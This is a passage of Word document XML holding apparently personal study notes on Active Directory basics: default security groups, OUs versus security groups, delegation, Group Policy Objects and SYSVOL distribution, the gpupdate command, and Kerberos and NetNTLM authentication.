              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00786006">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Other Domain Local groups from the same domain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2822CA" w14:textId="3A21A1E4" w:rsidR="006C0C7C" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00B971A0">
            <w:pPr>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00786006">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Accounts, Global groups, and Universal groups from other forests and from external domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00786006" w:rsidRPr="00786006" w14:paraId="7B3F8139" w14:textId="77777777" w:rsidTr="00786006">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0FF4768B" w14:textId="77777777" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30745DCE" w14:textId="77777777" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00B971A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="383A0CF3" w14:textId="1E0D510F" w:rsidR="00410D1B" w:rsidRPr="00410D1B" w:rsidRDefault="00B971A0" w:rsidP="00B971A0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Common </w:t>
      </w:r>
      <w:r w:rsidR="00410D1B" w:rsidRPr="00410D1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801BC68" w14:textId="24DF8592" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Domain Admins</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Users of this group have administrative privileges over the entire domain. By default, they can administer any computer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the domain, including the DCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A5B5EE" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Server Operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41411E43" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Backup Operators</w:t>
      </w:r>
      <w:r>
        <w:t>: Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A32D005" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Account Operators:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Users in this group can create or modify other accounts in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A634E4D" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Domain Users</w:t>
      </w:r>
      <w:r>
        <w:t>: Includes all existing user accounts in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF8477" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Domain Computers:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Includes all existing computers in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34498E51" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00410D1B">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Domain Controllers</w:t>
      </w:r>
      <w:r>
        <w:t>: Includes all existing DCs on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E57F0A" w14:textId="3DD363F9" w:rsidR="008A5D9A" w:rsidRDefault="00410D1B" w:rsidP="00410D1B">
      <w:r w:rsidRPr="00410D1B">
        <w:lastRenderedPageBreak/>
        <w:t>User rights are automatically assigned to some security groups when Active Directory is installed to help administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ex: if you add user to backup </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> he automatically will take the permission to download or upload any file on any device in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC6508" w14:textId="77777777" w:rsidR="00410D1B" w:rsidRDefault="00410D1B" w:rsidP="00410D1B"/>
    <w:p w14:paraId="29D55F97" w14:textId="77777777" w:rsidR="009F5B29" w:rsidRDefault="009F5B29" w:rsidP="00410D1B"/>
    <w:p w14:paraId="0409B48F" w14:textId="7E6BD4AD" w:rsidR="00410D1B" w:rsidRDefault="009F5B29" w:rsidP="009F5B29">
      <w:r w:rsidRPr="009F5B29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organizational Units (OUs)</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5B29">
        <w:t> which are container objects that allow you to classify users and machines. OUs are mainly used to define sets of users with similar policing requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24EF18" w14:textId="1A3EB6AC" w:rsidR="009F5B29" w:rsidRPr="009F5B29" w:rsidRDefault="009F5B29" w:rsidP="009F5B29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5B29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Note -&gt; user can only be a part of a single OU at a time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BCB60" w14:textId="77777777" w:rsidR="009F5B29" w:rsidRDefault="009F5B29" w:rsidP="009F5B29"/>
    <w:p w14:paraId="5A488CA8" w14:textId="7C420106" w:rsidR="007D0C0B" w:rsidRPr="007D0C0B" w:rsidRDefault="007D0C0B" w:rsidP="009F5B29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0C0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>OU vs Security Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C047C" w14:textId="77777777" w:rsidR="007D0C0B" w:rsidRPr="007D0C0B" w:rsidRDefault="007D0C0B" w:rsidP="007D0C0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0C0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organizational Units (OUs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A152A2E" w14:textId="0BC83B28" w:rsidR="007D0C0B" w:rsidRDefault="007D0C0B" w:rsidP="00587171">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0C0B">
        <w:t xml:space="preserve">used for </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>organizing users and computers</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>applying policies</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:t xml:space="preserve"> to them within Active Directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:t xml:space="preserve">can apply </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Objects (GPOs)</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:t xml:space="preserve"> to an OU to manage specific settings and configurations for users or computers within it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0C0B">
        <w:t>structured to reflect roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, departments in organization, </w:t>
      </w:r>
      <w:r w:rsidR="00587171" w:rsidRPr="00587171">
        <w:t>Single Membership</w:t>
      </w:r>
      <w:r w:rsidR="00587171">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C978E" w14:textId="77777777" w:rsidR="00587171" w:rsidRPr="00587171" w:rsidRDefault="00587171" w:rsidP="00587171">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00587171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569EF5C1" w14:textId="5FC92838" w:rsidR="00587171" w:rsidRDefault="00587171" w:rsidP="00587171">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00587171">
        <w:t xml:space="preserve">used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>grant permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:t xml:space="preserve"> to access resources like files, folders, printers, or even applications. They control what users can </w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:t xml:space="preserve"> rather than </w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>what policies apply to them</w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:t>. assign permissions to group on a resource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00587171">
        <w:t>Multiple Memberships Allowed</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB05E4" w14:textId="77777777" w:rsidR="00587171" w:rsidRDefault="00587171" w:rsidP="00587171">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39301C4F" w14:textId="54520DC1" w:rsidR="00587171" w:rsidRDefault="00587171" w:rsidP="00587171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OU like a folder that has users, security groups is a group with specific permissions and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>any one</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will added to the group will take the group permissions and we may add a full OU to a security group that mean tis OU (it’s users) will take </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D78EAD" w14:textId="77777777" w:rsidR="00587171" w:rsidRDefault="00587171" w:rsidP="00587171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095ABF51" w14:textId="77777777" w:rsidR="00C80C52" w:rsidRPr="00587171" w:rsidRDefault="00C80C52" w:rsidP="00587171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51454D2C" w14:textId="2214EBFE" w:rsidR="00587171" w:rsidRDefault="00A20537" w:rsidP="00E73EED">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00E73EED" w:rsidRPr="00E73EED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>elegation</w:t>
      </w:r>
      <w:r w:rsidR="00E73EED" w:rsidRPr="00E73EED">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00E73EED">
        <w:t>process that</w:t>
      </w:r>
      <w:r w:rsidR="00E73EED" w:rsidRPr="00E73EED">
        <w:t xml:space="preserve"> allows you to grant users specific privileges to perform advanced tasks on OUs without needing a Domain Administrator to step in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB7056" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="1DD9CA07" w14:textId="13D0C9CA" w:rsidR="00410D1B" w:rsidRDefault="004857C9" w:rsidP="004857C9">
      <w:r w:rsidRPr="004857C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Objects (GPO)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004857C9">
        <w:t>simply a collection of settings that can be applied to O</w:t>
      </w:r>
      <w:r w:rsidR="00D05087">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="004857C9">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004857C9">
        <w:t>GPOs can contain policies aimed at either users or computers</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21824752" w14:textId="1DF6EB2F" w:rsidR="00C80C52" w:rsidRDefault="004857C9" w:rsidP="00C80C52">
      <w:r w:rsidRPr="004857C9">
        <w:lastRenderedPageBreak/>
        <w:t>To configure Group Policies, you first create a GPO under </w:t>
      </w:r>
      <w:r w:rsidRPr="004857C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="004857C9">
        <w:t> and then link it to the OU </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD3EA18" w14:textId="644FDD9B" w:rsidR="00C80C52" w:rsidRDefault="00C80C52" w:rsidP="00C80C52">
      <w:r>
        <w:t xml:space="preserve">Can </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:t>apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:t> to GPOs so that they are only applied to specific users/computers under an OU. By default, they will apply to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authenticated Users</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:t> group, which includes all users/PCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0E2D5" w14:textId="3910B655" w:rsidR="00C80C52" w:rsidRDefault="00C80C52" w:rsidP="00C80C52">
      <w:r w:rsidRPr="00C80C52">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80C52">
        <w:t> tab includes the actual contents of the GPO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B01E27" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="65577612" w14:textId="5321B5CF" w:rsidR="00931C22" w:rsidRDefault="00931C22" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="004857C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Objects (GPO)</w:t>
      </w:r>
      <w:r>
        <w:t>: Can Contain many Polices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BCFAE" w14:textId="5DBAC5D1" w:rsidR="00931C22" w:rsidRDefault="00392AB0" w:rsidP="008A5D9A">
      <w:r>
        <w:t xml:space="preserve">To manage </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>GPO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we use the Group Policy Management tool, while AD management is by Active Directory Users and Computers Tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DB8CD" w14:textId="29EF412E" w:rsidR="00931C22" w:rsidRDefault="00931C22" w:rsidP="00931C22">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931C22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>GPO distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B691332" w14:textId="2D917972" w:rsidR="00931C22" w:rsidRDefault="00931C22" w:rsidP="00931C22">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931C22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>GPOs are distributed to the network via a network share called SYSVOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A200D3E" w14:textId="08A2342A" w:rsidR="00931C22" w:rsidRDefault="00931C22" w:rsidP="00931C22">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931C22">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">which is stored in </w:t>
      </w:r>
      <w:r w:rsidR="00392AB0" w:rsidRPr="00931C22">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00931C22">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. All users in a domain should typically have access to this share over the network to sync their GPOs periodically. The SYSVOL share points by default to the C:\Windows\SYSVOL\sysvol\ directory on each of the DCs in our network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D2A76" w14:textId="0D5B1A95" w:rsidR="00392AB0" w:rsidRDefault="00392AB0" w:rsidP="00392AB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">t might take up to 2 hours for computers to catch </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been made to any GPOs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA52E2" w14:textId="04EDD519" w:rsidR="00392AB0" w:rsidRDefault="00392AB0" w:rsidP="00392AB0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">to force any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>particular computer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to sync its GPOs immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35215BEC" w14:textId="4ADB5176" w:rsidR="00392AB0" w:rsidRPr="00392AB0" w:rsidRDefault="00392AB0" w:rsidP="00392AB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00392AB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>PS C:\&gt; gpupdate /force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461AF087" w14:textId="40503465" w:rsidR="00DF1416" w:rsidRDefault="00DF1416" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="3E7A4F1F" w14:textId="77777777" w:rsidR="00710593" w:rsidRDefault="00710593" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="5139E84D" w14:textId="77777777" w:rsidR="00710593" w:rsidRDefault="00710593" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="74BA0BC7" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="00710593"/>
    <w:p w14:paraId="1B43D414" w14:textId="158D9C83" w:rsidR="00710593" w:rsidRPr="00710593" w:rsidRDefault="00710593" w:rsidP="00710593">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="124F1A" w:themeColor="accent3" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00710593">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="124F1A" w:themeColor="accent3" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Two protocols can be used for network authentication in windows domains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142BCFB2" w14:textId="77777777" w:rsidR="00710593" w:rsidRPr="00710593" w:rsidRDefault="00710593" w:rsidP="00710593">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00710593">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberos:</w:t>
      </w:r>
      <w:r w:rsidRPr="00710593">
        <w:t> Used by any recent version of Windows. This is the default protocol in any recent domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB9DA1" w14:textId="77777777" w:rsidR="00710593" w:rsidRPr="00710593" w:rsidRDefault="00710593" w:rsidP="00710593">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00710593">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetNTLM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00710593">
        <w:t> Legacy authentication protocol kept for compatibility purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07603C64" w14:textId="0B388EA5" w:rsidR="00710593" w:rsidRDefault="00710593" w:rsidP="00710593">
